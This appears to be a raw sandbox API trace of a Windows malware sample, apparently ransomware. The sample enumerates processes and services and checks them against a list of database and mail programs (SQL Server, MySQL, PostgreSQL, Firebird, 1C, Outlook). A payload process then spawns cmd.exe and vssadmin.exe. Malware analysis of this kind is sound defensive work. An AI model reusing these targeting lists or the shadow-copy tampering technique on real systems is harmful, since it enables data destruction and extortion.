[0036.768] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0036.768] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0036.768] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0036.768] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0036.768] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0036.768] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0036.768] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.768] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.769] lstrlenW (lpString="smss.exe") returned 8 [0036.769] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0036.769] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0036.769] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0036.769] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0036.769] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0036.769] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0036.769] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.769] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.770] lstrlenW (lpString="csrss.exe") returned 9 [0036.770] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.770] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.770] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.770] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.770] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.770] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.770] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.770] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.770] lstrlenW (lpString="wininit.exe") returned 11 [0036.770] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0036.770] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0036.771] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0036.771] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0036.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0036.771] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0036.771] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.771] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.771] lstrlenW (lpString="csrss.exe") returned 9 [0036.771] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.771] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.771] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.771] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.771] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.772] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.772] lstrlenW (lpString="winlogon.exe") returned 12 [0036.772] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.773] lstrlenW (lpString="services.exe") returned 12 [0036.773] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.773] lstrlenW (lpString="lsass.exe") returned 9 [0036.773] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0036.774] lstrlenW (lpString="lsm.exe") returned 7 [0036.774] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.775] lstrlenW (lpString="svchost.exe") returned 11 [0036.775] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.775] lstrlenW (lpString="svchost.exe") returned 11 [0036.775] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.776] lstrlenW (lpString="svchost.exe") returned 11 [0036.776] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.776] lstrlenW (lpString="svchost.exe") returned 11 [0036.776] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.777] lstrlenW (lpString="svchost.exe") returned 11 [0036.777] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.778] lstrlenW (lpString="audiodg.exe") returned 11 [0036.778] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.778] lstrlenW (lpString="svchost.exe") returned 11 [0036.778] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.779] lstrlenW (lpString="svchost.exe") returned 11 [0036.779] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.780] lstrlenW (lpString="dwm.exe") returned 7 [0036.780] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.780] lstrlenW (lpString="explorer.exe") returned 12 [0036.780] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.781] lstrlenW (lpString="spoolsv.exe") returned 11 [0036.781] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.781] lstrlenW (lpString="taskhost.exe") returned 12 [0036.782] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.782] lstrlenW (lpString="svchost.exe") returned 11 [0036.782] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0036.783] lstrlenW (lpString="taskeng.exe") returned 11 [0036.783] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.783] lstrlenW (lpString="taskhost.exe") returned 12 [0036.783] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0036.784] lstrlenW (lpString="challenging.exe") returned 15 [0036.784] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0036.785] lstrlenW (lpString="pgp prix.exe") returned 12 [0036.785] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0036.785] lstrlenW (lpString="user-reno.exe") returned 13 [0036.785] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0036.786] lstrlenW (lpString="aggregate.exe") returned 13 [0036.786] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0036.786] lstrlenW (lpString="dressed.exe") returned 11 [0036.786] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0036.787] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0036.787] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0036.788] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0036.788] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0036.788] lstrlenW (lpString="developing.exe") returned 14 [0036.788] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0036.789] lstrlenW (lpString="supported.exe") returned 13 [0036.789] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0036.789] lstrlenW (lpString="girlstionselect.exe") returned 19 [0036.789] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0036.790] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0036.790] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0036.791] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0036.791] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0036.791] lstrlenW (lpString="eating.exe") returned 10 [0036.791] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0036.792] lstrlenW (lpString="nh_protected.exe") returned 16 [0036.792] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0036.792] lstrlenW (lpString="vulnerability.exe") returned 17 [0036.792] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0037.105] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0037.105] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0037.106] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0037.106] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0037.107] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0037.107] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0037.108] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0037.108] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0037.108] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0037.109] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.109] lstrlenW (lpString="dllhost.exe") returned 11 [0037.109] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.110] lstrlenW (lpString="dllhost.exe") returned 11 [0037.110] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0037.111] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0037.111] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0037.112] lstrlenW (lpString="cmd.exe") returned 7 [0037.112] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0037.113] lstrlenW (lpString="conhost.exe") returned 11 [0037.113] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0037.114] lstrlenW (lpString="vssadmin.exe") returned 12 [0037.114] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0037.127] CloseHandle (hObject=0x1a8) returned 1 [0037.127] Sleep (dwMilliseconds=0x1f4) [0037.916] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x67ffe0 [0037.917] EnumServicesStatusExW (in: hSCManager=0x67ffe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0037.917] GetLastError () returned 0xea [0037.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x64e1d8 [0037.917] EnumServicesStatusExW (in: hSCManager=0x67ffe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x64e1d8, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x64e1d8, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0037.918] CloseServiceHandle (hSCObject=0x67ffe0) returned 1 [0037.918] lstrlenW (lpString="Appinfo") returned 7 [0037.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0037.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0037.918] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0037.918] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0037.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0037.918] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0037.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.918] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.918] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0037.918] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0037.918] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0037.918] lstrlenW (lpString="AudioSrv") returned 8 [0037.918] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0037.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0037.919] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0037.919] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0037.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0037.919] lstrlenW (lpString="BFE") returned 3 [0037.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0037.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0037.919] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0037.919] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0037.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0037.919] lstrlenW (lpString="CryptSvc") returned 8 [0037.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0037.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0037.919] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0037.919] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0037.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0037.919] lstrlenW (lpString="CscService") returned 10 [0037.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0037.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0037.919] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0037.919] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0037.919] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0037.919] lstrlenW (lpString="DcomLaunch") returned 10 [0037.919] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.919] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.919] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0037.919] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0037.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0037.920] lstrlenW (lpString="Dhcp") returned 4 [0037.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0037.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0037.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0037.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0037.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0037.920] lstrlenW (lpString="Dnscache") returned 8 [0037.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0037.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 